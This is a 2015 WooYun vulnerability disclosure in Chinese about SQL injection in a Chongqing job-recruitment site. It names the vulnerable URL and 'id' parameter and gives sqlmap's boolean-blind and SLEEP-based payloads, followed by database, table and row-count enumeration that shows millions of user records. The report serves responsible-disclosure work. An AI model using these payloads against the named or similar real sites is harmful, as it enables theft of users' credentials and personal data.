当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144298

漏洞标题:重庆某人才网注入漏洞可泄露上百万用户信息量(账号+密码+邮箱)

相关厂商:重庆某人才网

漏洞作者: 路人甲

提交时间:2015-09-30 17:47

修复时间:2015-11-14 17:48

公开时间:2015-11-14 17:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

重庆某人才网注入漏洞,泄露上百万用户信息量。。。。

详细说明:

重庆某人才网存在SQL注入漏洞,泄露 上百万用户信息量。。。。账号密码 邮箱等。。。。。
链接:http://www.telecomhr.com/main/person.php?id=123922
| Table | Entries |
+-------------------+---------+
| userdata | 5780504 |
| job_views | 1147217 |
| pmember_views | 808496 |

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=123922 AND 2625=2625
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=123922 AND SLEEP(5)
---
[16:04:09] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[16:04:09] [INFO] fetching database names
[16:04:09] [INFO] fetching number of databases
[16:04:09] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:04:09] [INFO] retrieved:
[16:04:09] [WARNING] reflective value(s) found and filtering out
4
[16:04:09] [INFO] retrieved: information_schema
[16:04:33] [INFO] retrieved: mysql
[16:04:40] [INFO] retrieved: performance_schema
[16:05:07] [INFO] retrieved: telecomhr
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] telecomhr
current database:    'telecomhr'
current user:    'telecomhr@%'
Database: telecomhr
[83 tables]
+-------------------+
| admin_log         |
| admin_menu        |
| adminid           |
| advertising       |
| areacode          |
| aslist            |
| asmark            |
| assessment        |
| attachments       |
| cmember           |
| cmember_adv       |
| cmember_cents     |
| cmember_contact   |
| cmember_dept      |
| cmember_downloads |
| cmember_ext       |
| cmember_fans      |
| cmember_favrite   |
| cmember_group     |
| cmember_login     |
| cmember_msg       |
| cmember_payment   |
| cmember_recommend |
| cmember_remark    |
| cmember_sts       |
| cmember_sub       |
| edm               |
| edm_ext           |
| edm_smtp          |
| edm_sts           |
| emailvalidation   |
| feedback          |
| forum_forbiden    |
| forum_reply       |
| forum_tags        |
| forum_threads     |
| friendlink        |
| help              |
| job               |
| job_ext           |
| job_receive       |
| job_recommend     |
| job_tuijian       |
| job_views         |
| job_zhuanti       |
| mobilevalidation  |
| news              |
| o2o_apply         |
| o2o_apply_log     |
| o2o_company       |
| o2o_person        |
| o2o_project       |
| o2o_remark        |
| o2o_welog         |
| pmember           |
| pmember_cents     |
| pmember_cv        |
| pmember_edu       |
| pmember_ext       |
| pmember_favrite   |
| pmember_friend    |
| pmember_payment   |
| pmember_project   |
| pmember_receive   |
| pmember_training  |
| pmember_views     |
| pmember_work      |
| position          |
| promote           |
| qrlog             |
| rob_company       |
| rob_job           |
| searchlog         |
| session           |
| setting           |
| setting_ext       |
| sts               |
| subsite           |
| userdata          |
| userlog           |
| weixin            |
| weixin_setting    |
| weixin_user       |
+-------------------+

1.png


2.png


3.png


漏洞证明:

| Table             | Entries |
+-------------------+---------+
| userdata          | 5780504 |
| job_views         | 1147217 |
| pmember_views     | 808496  |
Database: telecomhr
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| userlog           | 7842310 |
| userdata          | 5878452 |
| job_views         | 1153020 |
| pmember_views     | 810923  |
| job_receive       | 631301  |
| cmember_sts       | 611884  |
| cmember_fans      | 561670  |
| pmember_favrite   | 494434  |
| pmember_cents     | 344327  |
| cmember_downloads | 255789  |
| cmember_cents     | 149928  |
| pmember_ext       | 109503  |
| pmember           | 109492  |
| pmember_edu       | 103854  |
| cmember_login     | 102211  |
| job_ext           | 96667   |
| job               | 96659   |
| pmember_project   | 86063   |
| pmember_work      | 83072   |
| attachments       | 56262   |
| cmember           | 38519   |
| cmember_ext       | 36579   |
| cmember_contact   | 36461   |
| pmember_cv        | 24477   |
| mobilevalidation  | 22552   |
| pmember_training  | 19759   |
| edm               | 19647   |
| weixin_user       | 16737   |
| cmember_favrite   | 15582   |
| edm_sts           | 9095    |
| emailvalidation   | 9083    |
| pmember_receive   | 8999    |
| searchlog         | 7680    |


4.png


5.png


6.png

修复方案:

过滤。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝